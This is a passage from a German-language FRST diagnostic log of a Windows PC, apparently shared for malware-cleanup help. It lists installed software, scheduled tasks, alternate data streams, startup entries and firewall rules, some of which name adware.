(HKLM-x32\...\{5A0C0737-6AFE-4DC6-A8B4-6DFE509ACD75}_is1) (Version: 0.5.31 - Cliqz.com) Counter-Strike (HKLM-x32\...\Steam App 10) (Version: - Valve) Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve) CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version: - CyberGhost S.R.L.) 
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd) Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group) Free YouTube Download version 3.2.61.805 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.61.805 - DVDVideoSoft Ltd.) Free YouTube to MP3 Converter version 3.12.61.805 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.61.805 - DVDVideoSoft Ltd.) GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.93 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\ICQ) (Version: 8.2.6901.0 - ICQ) ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\ICQ) (Version: 8.2.6901.0 - ICQ) iTunes (HKLM\...\{A535111D-95C8-487F-869E-CE4C239972D2}) (Version: 11.1.1.11 - Apple Inc.) 
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle) JetBoost (HKLM-x32\...\JetBoost_is1) (Version: 2.0.0 - BlueSprig) League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games ) League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden LibreOffice 4.2.2.1 (HKLM-x32\...\{0ECDB550-79ED-4E9E-851B-19A8B2B4EBFA}) (Version: 4.2.2.1 - The Document Foundation) Malwarebytes Anti-Malware Version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) 
(Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Mozilla Firefox 40.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 de)) (Version: 40.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3.5716 - Mozilla) Mozilla Thunderbird 24.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla) Native Instruments Audio 2 DJ Driver (HKLM-x32\...\Native Instruments Audio 2 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 4 DJ Driver (HKLM-x32\...\Native Instruments Audio 4 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 8 DJ Driver (HKLM-x32\...\Native Instruments Audio 8 DJ Driver) (Version: - Native Instruments) Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.8.2.281 - Native Instruments) Native 
Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.6.0.137 - Native Instruments) Native Instruments Traktor (HKLM-x32\...\Native Instruments Traktor) (Version: - Native Instruments) Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.9.0.1257 - Native Instruments) Native Instruments Traktor Audio 2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 6 Driver (HKLM-x32\...\Native Instruments Traktor Audio 6 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol D2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol D2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol F1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol F1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S8 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S8 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 MK2 Driver) (Version: - Native Instruments) Native 
Instruments Traktor Kontrol Z1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z2 Driver) (Version: - Native Instruments) NVIDIA 3D Vision Controller-Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 331.65 - NVIDIA Corporation) NVIDIA 3D Vision Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation) NVIDIA Grafiktreiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.13.0725 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0725 - NVIDIA Corporation) NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation) Opera Stable 32.0.1948.25 (HKLM-x32\...\Opera 32.0.1948.25) (Version: 32.0.1948.25 - Opera Software) Pidgin (HKLM-x32\...\Pidgin) (Version: 2.10.7 - ) pidgin-otr 4.0.0-1 (HKLM-x32\...\pidgin-otr) (Version: 4.0.0-1 - Cypherpunks CA) Poker 770 (HKLM-x32\...\Poker 770) (Version: - ) PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version: - PokerStars.eu) Project 64 version 2.1.0.1 (HKLM-x32\...\Project 64_is1) (Version: 2.1.0.1 - ) SHIELD Streaming (Version: 1.6.34 - NVIDIA Corporation) Hidden Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.) 
SleepTimer Ultimate 1.2 (HKLM-x32\...\{0EE56463-49B2-45E1-B74F-3E0139DBC986}_is1) (Version: - Christian Handorf) Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.13.13.201311261136 - Sony Mobile Communications AB) Sony PC Companion 2.10.188 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.188 - Sony) Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation) TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - ) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) TrackMania United (HKLM-x32\...\Steam App 7200) (Version: - Nadeo) TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) 
VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN) VNC Viewer 5.1.0 (HKLM\...\{8F29CFF4-4A54-4C34-8905-B74527DE93C8}) (Version: 5.1.0 - RealVNC Ltd) Web Companion (HKLM-x32\...\{99640eec-4d74-4df5-95f4-719dc27de6a8}) (Version: 2.0.1025.2130 - Lavasoft) Webocton - Scriptly 0.8.95.6 (HKLM-x32\...\Webocton - Scriptly_is1) (Version: 0.8.95.6 - Webocton) William Hill Poker (HKLM-x32\...\William Hill Poker) (Version: - ) WinRAR 5.01 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment) Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Wuala) (Version: 1.0.444.0 - LaCie) Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Wuala) (Version: 1.0.444.0 - LaCie) Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie) Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie) Xilisoft iPhone Magic (HKLM-x32\...\Xilisoft iPhone Magic) (Version: 5.7.5.20150727 - Xilisoft) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
==================== Wiederherstellungspunkte ========================= 19-09-2015 12:22:08 Gerätetreiber-Paketinstallation: Disc Soft Ltd Speichercontroller 19-09-2015 12:25:24 Installed Microsoft Office Professional Plus 2013 19-09-2015 12:25:49 PROPLUS 19-09-2015 12:38:57 Installed Microsoft Office Professional Plus 2013 19-09-2015 12:39:23 PROPLUS 19-09-2015 15:39:41 Installed Microsoft PowerPoint MUI (English) 2013 19-09-2015 15:40:31 Installed Microsoft PowerPoint MUI (English) 2013 19-09-2015 15:55:13 Installed Microsoft Office Professional Plus 2013 19-09-2015 15:56:35 PROPLUS 19-09-2015 16:15:26 Windows Update 20-09-2015 18:01:04 JRT Pre-Junkware Removal ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2009-07-14 04:34 - 2015-09-21 18:32 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
Task: {0D1A705F-BC57-4C56-9001-41F179ED8A24} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-09-19] (Piriform Ltd) Task: {2C62D752-B42F-4EBB-9A9B-8F3648694368} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13] (Adobe Systems Incorporated) Task: {2D33A450-57FF-4A00-AE28-E87E56431EBE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {4E8F7D37-0852-4EDC-861C-E3D03ECBABA7} - System32\Tasks\Opera scheduled Autoupdate 1438940281 => C:\Program Files (x86)\Opera\launcher.exe [2015-09-11] (Opera Software) Task: {69CAC2C9-9E20-47E3-9AAC-5005640B912E} - System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {6D06CB31-009E-45FA-A9FE-85EEEF758F7C} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {6D47D039-18B5-44B4-8059-2A192F7A2F7E} - System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {80ACD03E-D8E8-47EB-B041-F165F30E230D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) 
Task: {9200AA28-5EB6-4EAD-BF4E-CDF0410B5CF9} - System32\Tasks\{A3BB51D3-1E67-46C5-8ED5-8734DECD6918} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.261&LastError=404 Task: {A23C2641-27E1-4303-8187-0DBF0233649C} - System32\Tasks\JetBoost_AutoUpdate => C:\Program Files (x86)\BlueSprig\JetBoost\AutoUpdate.exe [2012-11-27] (BlueSprig) Task: {B304FCBA-F8AD-455F-95F7-BBA64D8987AB} - System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {B4A8F9FA-04C0-40CF-95EB-AE47E2BB4073} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {C1019F60-C40C-40F9-99E0-A20254841B65} - System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} => pcalua.exe -a "C:\Users\Kenny G\Desktop\bewerbung\bitdefender_isecurity.exe" -d "C:\Users\Kenny G\Desktop\bewerbung" Task: {C4EDDEAE-BCF6-49B9-A64D-CACA20F51E9E} - System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {C7A41BF4-00C0-4FC0-A9C1-22B5B9F7ACC5} - System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{0FBD9ABF-7DA0-463E-A7DC-A394052CC9A8}\Setup.exe" -c -runfromtemp -l0x0407 -removeonly Task: {CB8F7966-49EF-42D7-B59C-81E070B86191} - System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {EFCA144A-E45A-4877-8FAD-E51248235D56} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) 
Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2015-06-02 09:01 - 2015-08-26 11:33 - 01205136 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe 2013-11-03 19:09 - 2013-10-23 10:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2014-01-15 20:58 - 2014-01-15 21:16 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe 2015-09-19 11:34 - 2015-09-19 11:34 - 01610240 _____ () C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs 2013-09-13 19:51 - 2013-09-13 19:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2013-09-13 19:51 - 2013-09-13 19:51 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) 
AlternateDataStreams: C:\ProgramData\TEMP:373E1720 AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_12.1_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_13.1.2_x64_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\torbrowser-install-3.5.2_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\HiJackThis204.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\jetboost-setup-2.0.0.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupCasino_aad73b_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupPoker_5fabb7.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\TitanBSetup_5c0cd5.exe:BDU AlternateDataStreams: C:\Users\Tabea Studium\Downloads\Shockwave_Installer_Slim.exe:BDU ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\webcompanion.com -> hxxp://webcompanion.com ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) 
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Control Panel\Desktop\\Wallpaper -> HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\eLoot\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\Tabea Studium\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.2.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk => C:\Windows\pss\MyPC Backup.lnk.Startup MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" MSCONFIG\startupreg: Bdagent => "C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe" MSCONFIG\startupreg: Bitdefender-Geldbörse => MSCONFIG\startupreg: Bitdefender-Geldbörse-Anwendungs-Agent => MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min MSCONFIG\startupreg: FreeAC => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe -autorun MSCONFIG\startupreg: 
GoogleChromeAutoLaunch_9CD6D292798361639A68D2D1D9501714 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window MSCONFIG\startupreg: icq => C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe -CU MSCONFIG\startupreg: InstallerLauncher => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\Installer.exe" MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe" MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe MSCONFIG\startupreg: Optimizer Pro => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe MSCONFIG\startupreg: Sony PC Companion => "C:\Program Files (x86)\Sony\Sony PC Companion\PCCompanion.exe" /Background MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
FirewallRules: [{F1E8D03D-FFA2-42DD-A766-22ABE0AD0436}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{A0A07BA7-2135-482B-8CF0-7D59DA237E7B}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe FirewallRules: [{15629829-3DD3-4A81-B20D-4255F55023B9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{51D8DA04-F385-4088-8779-22A2C6969D59}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{1CD2F4D1-8114-4FBA-9D7E-4BFC8959B015}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{1B40452A-2002-47A8-B02E-49C07A677A04}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{B6489A7B-4235-4D96-99A9-EEDD6A2FE8BD}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe FirewallRules: [{720D02FF-52F6-4154-A621-5AB2A3DB03A3}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{C7AF308F-8BD1-41D4-A681-37A1C88C993A}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{10736636-FB53-42C9-A3F4-529BAFEF521E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{750C88E5-8449-4ED6-87F6-6F9A40C73F22}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{72A3B8D8-259B-478D-8EA1-E3F979D8CA18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{81B1EC25-555A-4F2F-9395-9FD97F51323B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{2C423E45-FD79-468B-B116-1FC2C2477842}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{DA81D9C0-E7D2-4027-B0A5-A8A45C00F77D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{521249EF-E21D-4C4E-8C32-FDD3F208B733}] => (Allow) 
C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{89E0E88B-D4E4-491D-A414-02FCD1F3D197}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{1C8A9419-FD22-4DAA-A57C-F115A281A979}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{8B608DD6-21BB-4A2E-8800-E7106712C6F0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{A1CF8413-A121-4594-8D4F-822D997AD1F7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{78D1B940-9035-4A6C-BF79-C39436D455B2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{9FD597A8-5DF3-405B-BF40-DAD0B4A3D331}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: 